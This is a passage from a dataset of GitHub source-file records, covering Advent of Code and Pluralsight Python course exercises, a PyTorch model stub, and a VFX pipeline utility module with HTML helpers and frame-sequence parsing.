len(map[0])\nfor row_idx, row in enumerate(map):\n if '@' in row:\n col_idx = row.index('@')\n starting_pos = (row_idx, col_idx)\nprint(f'Starting position is {starting_pos}')\n\ndaks = find_doors_and_keys(map)\n\n# create dict of distances from every key/door to every other key/door\n# first entry is starting position @\ndistances = {'@': flood_from(map, starting_pos)}\n# add all other keys and doors' data to distances\nfor dak, position in daks.items():\n # print(f\"{dak} is at position {position}\")\n distances[dak] = flood_from(map, position)\n# print(distances)\nprint(distances.keys())\nnum_keys = len([key for key in distances.keys() if is_key(key)])\nprint(num_keys)\n# print(find_accessible(distances, 'f', ''))\nprint(find_shortest_path(distances, num_keys))\n\n\n" }, { "alpha_fraction": 0.5212038159370422, "alphanum_fraction": 0.5307797789573669, "avg_line_length": 27.038461685180664, "blob_id": "96760dd5d7d730b7084f02264dd4520d9669b17c", "content_id": "977a88e456199f3c78e0b66af389daf62e37fa4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 731, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/day1.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "def calc_fuel(mass):\n fuel = mass//3 - 2\n print(f'initial fuel: {fuel}')\n to_offset = fuel\n while True:\n offset = to_offset//3 - 2\n print(f'calculated offset: {offset}')\n if offset <= 0:\n break\n else:\n fuel += offset\n to_offset = offset\n return fuel\n\nif __name__ == '__main__':\n with open('day1input.txt') as f:\n raw_input = f.read()\n module_mass_str = raw_input.split('\\n')\n for mms in module_mass_str:\n if mms == '':\n module_mass_str.remove('')\n module_mass_num = [int(module) for module in module_mass_str]\n fuel_sum = 0\n for mass in module_mass_num:\n fuel_sum += calc_fuel(mass)\n print(fuel_sum)\n\n\n" } ]
4
rzxdczt/git-demo
https://github.com/rzxdczt/git-demo
6ba39aa741c226ae86cef5f3e6a90e167683549f
9ac5b979a963fd75e435e9d5477687e68fb6858d
90c7d66bcbc38f503689cff1fdb6cc0775cc0ed8
refs/heads/master
2020-06-05T02:41:39.101373
2019-06-19T02:53:13
2019-06-19T02:53:13
192,286,411
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6393442749977112, "alphanum_fraction": 0.6442623138427734, "avg_line_length": 34.882354736328125, "blob_id": "c20e09a25a07fb89724935cc52be81b4f25a207f", "content_id": "b119ffaeefc28bb9284e4e7563aa52fc5e065268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/model.py", "repo_name": "rzxdczt/git-demo", "src_encoding": "UTF-8", "text": "#coding:utf8\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass PoetryModel(nn.Module):\n def __init__(self, vocab_size, embedding_dim, hidden_dim):\n super(PoetryModel, self).__init__()\n self.hidden_dim = hidden_dim\n self.embedding_dim = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, self.hidden_dim, num_layers = 2, batch_ = True)\n self.linear1 = nn.Linear(self.hidden_dim, vocab_size)\n\n def forward(self, input, hidden = None):\n seq_len, batch_size = input.zise()\n if hidden is None:\n pass\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 21, "blob_id": "eb309d673ad19d9659080224b74104f1ae138d00", "content_id": "8d20896878d0353481ab1b68bfbce5ce68d55bc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/main.py", "repo_name": "rzxdczt/git-demo", "src_encoding": "UTF-8", "text": "I was changed in dev1 branch.\nI was changed in dev.\njob from boss.\nlet us add one line.\n" } ]
2
jalgalvis/Pluralsight
https://github.com/jalgalvis/Pluralsight
a135a4e465cdd9ad94b0de88ec7ea563e48467cd
6808926bd5e636bd1e66045b8b8cf90473d21378
54e67794f59eb83d6bbbfe28a62e4347b8100584
refs/heads/main
2023-02-08T05:19:15.978297
2020-12-30T22:51:17
2020-12-30T22:51:17
325,661,820
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6019678115844727, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 20.09433937072754, "blob_id": "4bcce21c4c5e97ccfabd4cc863a568465af7cdbd", "content_id": "7f483ded14ecf96846b783983f472db612004b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1118, "license_type": "no_license", "max_line_length": 64, "num_lines": 53, "path": "/Python-Libraries/materials/pandas-fundamentals/demos/m3/demo.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\n\n# Let's load the data for the first time\ndf = pd.read_pickle(os.path.join('..', 'data_frame.pickle'))\n\n# Demo 1\ndf.artist\nartists = df['artist']\npd.unique(artists)\nlen(pd.unique(artists))\n\n# Demo 2\ns = df['artist'] == 'Bacon, Francis'\ns.value_counts()\n \n# Other way\nartist_counts = df['artist'].value_counts()\nartist_counts['Bacon, Francis']\n\n# Demo 3\ndf.loc[1035, 'artist']\ndf.iloc[0, 0]\ndf.iloc[0, :]\ndf.iloc[0:2, 0:2]\n\n# Try multiplication\ndf['height'] * df['width']\ndf['width'].sort_values().head()\ndf['width'].sort_values().tail()\n\n# Try to convert\npd.to_numeric(df['width'])\n\n# Force NaNs \npd.to_numeric(df['width'], errors='coerce')\ndf.loc[:, 'width'] = pd.to_numeric(df['width'], errors='coerce')\n\npd.to_numeric(df['height'], errors='coerce')\ndf.loc[:, 'height'] = pd.to_numeric(df['height'],\n errors='coerce')\n\ndf['height'] * df['width']\ndf['units'].value_counts()\n\n# Assign - create new columns with size\narea = df['height'] * df['width']\ndf = df.assign(area=area)\n\ndf['area'].max()\ndf['area'].idxmax()\ndf.loc[df['area'].idxmax(), :]\n" }, { "alpha_fraction": 0.6614999771118164, "alphanum_fraction": 0.6834999918937683, "avg_line_length": 31.770492553710938, "blob_id": "fb4f3938de11e4ab3bc64c3a30f15093823cf0be", "content_id": "dac22f82ad8730e512758dbdc5428b1cba1ae198", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2000, "license_type": "no_license", "max_line_length": 96, "num_lines": 61, "path": "/Core-Python/classExamples.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "\"\"\"Model for aircraft flights\"\"\"\n\n\nclass ClassTest:\n\n def instanceMethod(self):\n return \"0001\"\n\n\nclass ClassTest1:\n\n def __init__(self, instanceAttribute):\n self._instanceAttribute = instanceAttribute\n\n def instanceMethod(self):\n return self._instanceAttribute\n\n\nclass ClassTest2:\n\n def __init__(self, instanceAttribute):\n if not instanceAttribute[:2].isalpha():\n raise ValueError(f\"Not 2 initial letters in '{instanceAttribute}'\")\n if not instanceAttribute[:2].isupper():\n raise ValueError(f\"Not 2 initial Upper letters in '{instanceAttribute}'\")\n if not [instanceAttribute[2:].isdigit() and int(instanceAttribute[2:]) <= 9999]:\n raise ValueError(f\"Invalid number in '{instanceAttribute}'\")\n\n self._instanceAttribute = instanceAttribute\n\n def instanceMethod(self):\n return self._instanceAttribute\n\n def instanceMethodPartial(self):\n return self._instanceAttribute[:2]\n\n\nclass ClassTest3:\n\n def __init__(self, instanceAttribute):\n if not instanceAttribute[:2].isalpha():\n raise ValueError(f\"Not 2 initial letters in '{instanceAttribute}'\")\n if not instanceAttribute[:2].isupper():\n raise ValueError(f\"Not 2 initial Upper letters in '{instanceAttribute}'\")\n if not [instanceAttribute[2:].isdigit() and int(instanceAttribute[2:]) <= 9999]:\n raise ValueError(f\"Invalid number in '{instanceAttribute}'\")\n\n self._instanceAttribute = instanceAttribute\n\n\nclass ClassTest4:\n def __init__(self, instanceAttribute1, instanceAttribute2, instanceAttribute3):\n self._instanceAttribute1 = instanceAttribute1\n self._instanceAttribute2 = instanceAttribute2\n self._instanceAttribute3 = instanceAttribute3\n\n def instanceAttribute1(self):\n return self._instanceAttribute1\n\n def instanceAttribute4(self):\n return range(1, self._instanceAttribute2), \"ABCDFGKLMNOPQRST\"[:self._instanceAttribute3]\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 26, "blob_id": "44df617bd021eebf514eeeb4a8c4beca6207b0b2", "content_id": "cafe4364cbc4e62a268d0d7a822a05f15432d95c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# Pluralsight\n Materials for courses from Pluralsight\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8823529481887817, "avg_line_length": 34, "blob_id": "74c1bceb34d0096aa0a3180a35c3701c62e9b4e0", "content_id": "a4bf82b7221b7cbe9b3453d9a0b21000d7a468df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Python-Beyond-The-Basics/reader1/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader1.reader1 import Reader" }, { "alpha_fraction": 0.7562500238418579, "alphanum_fraction": 0.78125, "avg_line_length": 52.66666793823242, "blob_id": "fbaf80ff98ecc7b9dc6ac8304613855e43a14eb7", "content_id": "b6bc735c752e7d524498a5b1ccc4cf2b105c1e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 60, "num_lines": 3, "path": "/Python-Beyond-The-Basics/reader2/reader2/compressed/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader2.compressed.bzipped import opener as bz2_opener\nfrom reader2.compressed.gzipped import opener as gzip_opener\n__all__ = ['bz2_opener', 'gzip_opener']" }, { "alpha_fraction": 0.6350092887878418, "alphanum_fraction": 0.666201114654541, "avg_line_length": 33.11111068725586, "blob_id": "55362a94b2c454506764bc86455dd709e4ca5452", "content_id": "5190e06bc44a0b430a99493aa149ada7c815ece8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2148, "license_type": "no_license", "max_line_length": 102, "num_lines": 63, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-04/app.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QWidget, QComboBox\nfrom PyQt5.QtCore import QSize, QRect \n\nimport numpy as np\n\nfrom matplotlib.figure import Figure \nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets, QtGui\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas, NavigationToolbar2QT as NavigationToolbar\n\nimport helper\n\nclass MPLDemoWindow(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.setMinimumSize(QSize(800, 600)) \n self.setWindowTitle(\"Matplotlib Demo\") \n\n centralWidget = QWidget(self) \n self.setCentralWidget(centralWidget)\n\n layout = QtWidgets.QVBoxLayout(centralWidget)\n layout.setGeometry(QRect(80, 20, 640, 480))\n\n self.canvas = FigureCanvas(Figure(figsize=(6, 4)))\n layout.addWidget(self.canvas)\n\n self.ax = self.canvas.figure.subplots()\n year = 2013\n heights = [month[1] for month in helper.precip_sums_for_year(year)]\n self.ax.bar(np.arange(len(heights)), heights)\n self.ax.set_xticks(np.arange(len(helper.MONTHS)))\n self.ax.set_xticklabels(helper.MONTHS)\n\n self.yearsBox = QComboBox(centralWidget)\n self.yearsBox.setGeometry(QRect(40, 560, 720, 31))\n self.yearsBox.setObjectName((\"yearsBox\"))\n self.yearsBox.addItem(\"2013\")\n self.yearsBox.addItem(\"2014\")\n self.yearsBox.addItem(\"2015\")\n self.yearsBox.addItem(\"2016\")\n self.yearsBox.addItem(\"2017\")\n self.yearsBox.addItem(\"2018\")\n\n\n self.yearsBox.currentIndexChanged.connect(self.show_precip_for_year)\n\n def show_precip_for_year(self, i):\n year = 2013 + i\n heights = [month[1] for month in helper.precip_sums_for_year(year)]\n self.ax.clear()\n self.ax.bar(np.arange(len(heights)), heights)\n self.ax.set_xticks(np.arange(len(helper.MONTHS)))\n self.ax.set_xticklabels(helper.MONTHS)\n self.canvas.draw()\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n mainWin = MPLDemoWindow()\n mainWin.show()\n sys.exit( app.exec_() )" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.774193525314331, "avg_line_length": 30, "blob_id": "83e8102b8deca771a47c26fdec3e6f4cecadb2cf", "content_id": "bf2762c1c2b493ef7eee1081210a7e6f963a052f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-02/login.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "USERNAME='your-plotly-username'\nAPI_KEY='your-plotly-api-key'\n" }, { "alpha_fraction": 0.5525113940238953, "alphanum_fraction": 0.5525113940238953, "avg_line_length": 21, "blob_id": "7b77cf0edb0a16b55288ac8788010e6dd91f30d8", "content_id": "beeaf906759c55c6aa369d84f572ff6f821e828f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/Python-Beyond-The-Basics/reader/reader.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "class Reader:\n def __init__(self, filename):\n self._filename = filename\n self.f = open(filename, mode='rt')\n\n def close(self):\n self.f.close()\n\n def read(self):\n return self.f.read()" }, { "alpha_fraction": 0.7326732873916626, "alphanum_fraction": 0.735973596572876, "avg_line_length": 17.9375, "blob_id": "d067d1d827cf987936d19244ef5e4770503928c0", "content_id": "baf7be2f67891f12877c37ca849e45fc7ca7711a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 303, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-02/m07-02.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import plotly.plotly as py \n\nimport login \n\npy.sign_in(login.USERNAME, login.API_KEY)\n\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport helper\n\nheights = [month[1] for month in helper.precip_sums_for_year()]\n\nfig, ax = plt.subplots()\nax.bar(np.arange(len(heights)), heights)\n\npy.plot_mpl(fig)\n" }, { "alpha_fraction": 0.6057692170143127, "alphanum_fraction": 0.625, "avg_line_length": 20, "blob_id": "bc831919701210fb40ac16afc901907853ec59b0", "content_id": "6604ac9a72215facdba75efa7177bdedd163d131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/Core-Python/files.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nf = open(sys.argv[1], mode= 'rt', encoding= 'utf-8')\nfor line in f:\n print(line)\nf.close()" }, { "alpha_fraction": 0.626086950302124, "alphanum_fraction": 0.643478274345398, "avg_line_length": 22.200000762939453, "blob_id": "4f8ea8f705b2720bff613d6e282fd6937ef0b983", "content_id": "45e80b2b20afc2b4c102f20108722bd57c367062", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/Core-Python/files1.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "import sys\nf = open(sys.argv[1], mode= 'rt', encoding= 'utf-8')\nfor line in f:\n sys.stdout.write(line)\nf.close()" }, { "alpha_fraction": 0.5297619104385376, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 25.15625, "blob_id": "6894157e638622a944718e32ea1d338a4598bc29", "content_id": "fc4b00bf64817f3733660be56074bc0f6c145658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 53, "num_lines": 32, "path": "/Python-Libraries/materials/pandas-fundamentals/demos/m2/demo_1.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\n\n# Where our data lives\nCSV_PATH = os.path.join('..', 'collection-master',\n 'artwork_data.csv')\n\n# Read just 5 rows to see what's there\ndf = pd.read_csv(CSV_PATH, nrows=5)\n\n# Specify an Index\ndf = pd.read_csv(CSV_PATH, nrows=5,\n index_col='id')\n# Limit columns\ndf = pd.read_csv(CSV_PATH, nrows=5,\n index_col='id',\n usecols=['id', 'artist'])\n\n# All columns that we need\nCOLS_TO_USE = ['id', 'artist',\n 'title', 'medium', 'year',\n 'acquisitionYear', 'height',\n 'width', 'units']\n\n# Proper data loading\ndf = pd.read_csv(CSV_PATH,\n usecols=COLS_TO_USE,\n index_col='id')\n\n# Save for later\ndf.to_pickle(os.path.join('..', 'data_frame.pickle'))\n\n\n\n" }, { "alpha_fraction": 0.6545454263687134, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 23.0625, "blob_id": "d36b22ba68f0cf9a394694cafbadafc1224c1c98", "content_id": "c3114059a5466b96dd22865850291678c9182f40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/Matplotlib/pluralsigth-slides/07/demos/07/m07-03/app.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from io import BytesIO\nimport base64\n\nfrom flask import Flask, render_template, request\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport helper\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n year = int(request.args.get('year', 2013))\n heights = [month[1] for month in helper.precip_sums_for_year(year=year)]\n plt.bar(np.arange(len(heights)), heights)\n plt.xticks(ticks=np.arange(len(helper.MONTHS)), labels=helper.MONTHS)\n plt.title('Monthly Total Precipitation for {}'.format(year))\n\n buf = BytesIO()\n plt.savefig(buf, format='png')\n buf.seek(0)\n\n b64data = base64.b64encode(buf.getvalue()).decode()\n\n plt.close()\n\n return render_template('index.html', img=b64data)\n\nif __name__ == '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6367461681365967, "alphanum_fraction": 0.6381486654281616, "avg_line_length": 23.586206436157227, "blob_id": "c2155e2e513e41a4619da379e27cad5937d1c0ba", "content_id": "fdc7dc53b65f31675c5de484fbcad611ccf961b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/Core-Python/wordsHardCodedUrl.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from urllib.request import urlopen\n\n\ndef fetch_words_HCU():\n story = urlopen('http://sixty-north.com/c/t.txt')\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n story.close()\n # in case the function is called from a module returns the list\n return story_words\n\n\ndef print_items_HCU(items):\n for item in items:\n print(item)\n\n\ndef main():\n words = fetch_words_HCU()\n print_items_HCU(words)\n\n\n# with the following statement we use __name__ to determine if the module\n# is called from another module or if it's being called as a script.\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6427807211875916, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 22.375, "blob_id": "8e1d15676248a2085d30d46c05c36f0e32ac52c9", "content_id": "d9864118168b495ec75a40eb40d74851044957d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "no_license", "max_line_length": 73, "num_lines": 40, "path": "/Core-Python/words.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n\"\"\"Retrieve and print words from a URL\"\"\"\n\nimport sys\nfrom urllib.request import urlopen\n\n\ndef fetch_words(url):\n \"\"\"Fetch a list of words from a URL\n\n :param url: The URL of UTF-8 text document.\n :return: A list of strings containing the words from the document\n \"\"\"\n\n story = urlopen(url)\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n story.close()\n # in case the function is called from a module returns the list\n return story_words\n\n\ndef print_items(items):\n for item in items:\n print(item)\n\n\ndef main(url):\n words = fetch_words(url)\n print_items(words)\n\n\n# with the following statement we use __name__ to determine if the module\n# is called from another module or if it's being called as a script.\n\nif __name__ == '__main__':\n main(sys.argv[1])\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8823529481887817, "avg_line_length": 34, "blob_id": "19a8efb726e4c30a809aaeb64936192fcafd54bb", "content_id": "b7a969ca714a4e4c88af4bbc1e712a45677a75f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Python-Beyond-The-Basics/reader2/reader2/__init__.py", "repo_name": "jalgalvis/Pluralsight", "src_encoding": "UTF-8", "text": "from reader2.reader2 import Reader" } ]
16
JimBae/ShotgunUtils
https://github.com/JimBae/ShotgunUtils
9324abaea91a14d0121281c1b20ecaa9003d8b6f
2e88f7144da96719021627c90e02a83b7ebe9f48
b52333da2763a7d812ddea729bde8378cd7e23d6
refs/heads/master
2018-05-13T11:47:50.305445
2017-05-28T09:40:54
2017-05-28T09:40:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5587757229804993, "alphanum_fraction": 0.5734493136405945, "avg_line_length": 28.77845001220703, "blob_id": "f9a668531f379050a7cbb75e4cb54ccb5736d460", "content_id": "67722d02d41876001495c27cfdb789c48794272c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24602, "license_type": "no_license", "max_line_length": 169, "num_lines": 826, "path": "/Common_Utility.py", "repo_name": "JimBae/ShotgunUtils", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#------------#\n# utility.py #\n#-------------------------------------------------------#\n# Jinhyuk #\t\n#-------------------------------------------------------#\n\n#========================\n# import library\n#========================\n\nimport sys, string, os, glob\nimport base64\nimport subprocess\nimport shutil\nfrom xml.etree import ElementTree as ET\n\n# for excel file\nfrom openpyxl.styles import Font, Color\nfrom openpyxl.styles import colors\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Border, Side, PatternFill, Font, GradientFill, Alignment\nfrom openpyxl.drawing.image import Image\n\n#========================\n# html & javascript\n#========================\n\ndef startHTML():\n \"\"\"!@brief Before start html code, call this function in cherrypy code.\n \"\"\"\n\n retStr = \"<!DOCTYPE html>\"\n retStr += \"<head>\"\n #retStr += \"<link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"/static/css/site.css\\\" >\"\n # CSS\n retStr += \"<style>\"\n retStr += \"body { background-color: #bfbfbf; }\"\n retStr += \"p { color: #2A6008; background-color: #DFF2BF; font-size: 18px; }\"\n retStr += \"p.DoneText { color: #2A6008; background-color: #DFF2BF; font-size: 18px; }\"\n retStr += \"p.WarningText{ color: #9F6000; background-color: #FEEFB3; font-size: 18px; }\"\n retStr += \"p.ErrorText { color: #D8000C; background-color: #FFBABA; font-size: 18px; }\"\n retStr += \"p.EndText { color: #003380; background-color: #99c2ff; font-size: 21px; }\"\n retStr += \"p.WarningBigText{ color: #9F6000; background-color: #FEEFB3; font-size: 22px; }\"\n retStr += \"p.TitleText{ color: #4d4d00; background-color: #99ff99; font-size: 22px; }\"\n retStr += \"p.DoneTextBig { color: #2A6008; background-color: #DFF2BF; font-size: 22px; }\"\n retStr += \"p.WarningTextBig{ color: #9F6000; background-color: #FEEFB3; font-size: 22px; }\"\n retStr += \"p.ErrorTextBig { color: #D8000C; background-color: #FFBABA; font-size: 22px; }\"\n retStr += \".loader { border: 8px solid #f3f3f3; border-top: 8px solid #3498db; border-radius: 50%; width: 30px; height: 30px; animation: spin 2s linear infinite; }\"\n retStr += \".loader2 { border: 8px solid #f3f3f3; border-top: 8px solid #3498db; border-radius: 50%; width: 30px; height: 30px; animation: spin 0s linear infinite; }\"\n retStr += \"@keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }\"\n # form for fxPostConfig\n \n\n retStr += \"</style>\"\n retStr += \"<script src=\\\"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js\\\"></script>\"\n retStr += \"</head>\"\n retStr += \"<body>\"\n return retStr\n\ndef endHTML():\n \"\"\"!@brief After finishing html code, call this function in cherrypy code.\n \"\"\"\n retStr = \"</body>\"\n retStr += \"</html>\"\n return retStr\n\ndef startJS():\n \"\"\"!@brief Before start javascript code, call this function in cherrypy code.\n \"\"\"\n return '''<script type=\\\"text/javascript\\\" language=\\\"javascript\\\">'''\n\ndef endJS():\n \"\"\"!@brief After finish javascript code, call this function in cherrypy code.\n \"\"\"\n return \"</script>\"\n\ndef progressBar():\n \"\"\"!@brief \n \"\"\"\n return '''<progress id=\\\"proBar\\\" value=\\\"0\\\" max=\\\"100\\\" style=\\\"width:300px;\\\"></progress>\n <span id=\\\"curr\\\"></span>\n <script type=\\\"text/javascript\\\" language=\\\"javascript\\\">\n function progressing(al) {\n var bar = document.getElementById('proBar');\n var status = document.getElementById('curr');\n status.innerHTML = al+\"%\";\n bar.value = al;\n\n if(al >= 100) {\n status.innerHTML = \"100%\";\n bar.value = 100;\n }\n }</script>'''\n\ndef progressBarValue( currentValue ):\n retStr = str( \"progressing(\" ) + str( currentValue ) + str(\");\")\n return retStr\n\n\n#============================\n# Sequence\n#============================\n\nclass seqObj():\n def __init__(self):\n self.nameOfSeq=''\n self.ext=''\n self.errors=list()\n self.startFrame=''\n self.endFrame=''\n self.pathToSeq=''\n self.padding=''\n self.passed=None\n \nclass seqContainer():\n def __init__(self):\n self.mySequences=list()\n\n#========================\n# Utility functions\n#========================\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\ndef makeShowSubDirectory( path ):\n\n chmodNumRoot = 02755 # drwxrwsr-x(2775), drwxr-xr-x(2755)\n chmodNumArtist = 02775 # drwxrwsr-x(2775), drwxr-xr-x(2755)\n uidNameFxServices = 1383 # root: 0, jinhyukb: 1369, fxservices: 1383\n gidNameArtist = 900 # artist\n gidNamePipe = 906 # pipe\n\n path = str(path)\n\n if not os.path.exists( path ):\n print \"Error@makeShowSubDirectory()::Failed to run mkdir(%s)\"%path\n return\n\n dirList = []\n try:\n dirList = getShowSubDir( path )\n except:\n print \"Error@makeShowSubDirectory()::Failed to run getShowSubDir()\"\n\n for subdir in dirList :\n if not os.path.exists( subdir ):\n try:\n os.mkdir( subdir, chmodNumArtist )\n except:\n print \"Error@makeShowSubDirectory()::Failed to run mkdir(%s)\"%subdir\n\n try:\n os.chown( subdir, uidNameFxServices, gidNameArtist )\n except:\n print \"Error@makeShowSubDirectory()::Failed to chown mkdir(%s)\"%subdir\n\n\ndef getMinMaxFrame( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n minFrame = 100000\n maxFrame = -100000\n\n for fName in files:\n fName_split = fName.split( dirName )[1]\n #print fName_split\n \n fNameWithoutExt= ''\n if \".dpx\" in fName_split:\n fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n elif \".exr\" in fName_split:\n fNameWithoutExt = fName_split.split( \".exr\" )[0]\n else:\n continue\n\n # max padding 6\n numOfPadding = 0\n for pIdx in range(-1, -7, -1):\n if not fNameWithoutExt[pIdx].isdigit():\n break\n numOfPadding += 1\n \n fileNameOnly = fNameWithoutExt[0:-(numOfPadding)]\n\n numStr = fNameWithoutExt.split( fileNameOnly )[1]\n\n if not numStr.isdigit():\n print \"Error@getMinMaxFrame(): numStr variables is not number %s\"%numStr\n\n currentFrame = int(numStr)\n\n if currentFrame < minFrame :\n minFrame = currentFrame\n\n if currentFrame > maxFrame :\n maxFrame = currentFrame\n\n return minFrame, maxFrame\n\ndef getExtension( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n for fName in files:\n fName_split = fName.split( dirName )[1]\n #print fName_split\n \n fNameWithoutExt= ''\n if \".dpx\" in fName_split:\n fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n return \"dpx\"\n elif \".exr\" in fName_split:\n fNameWithoutExt = fName_split.split( \".exr\" )[0]\n return \"exr\"\n else:\n print \"Warning@getPadding: Not matching the extension.(dpx or exr)\"\n\ndef getPadding( dirName ): \n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n for fName in files:\n fName_split = fName.split( dirName )[1]\n #print fName_split\n \n fNameWithoutExt= ''\n if \".dpx\" in fName_split:\n fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n elif \".exr\" in fName_split:\n fNameWithoutExt = fName_split.split( \".exr\" )[0]\n else:\n continue\n\n # max padding 6\n numOfPadding = 0\n for pIdx in range(-1, -7, -1):\n if not fNameWithoutExt[pIdx].isdigit():\n break\n numOfPadding += 1\n\n return numOfPadding\n\ndef getFileNameOnlyList( dirName ):\n if 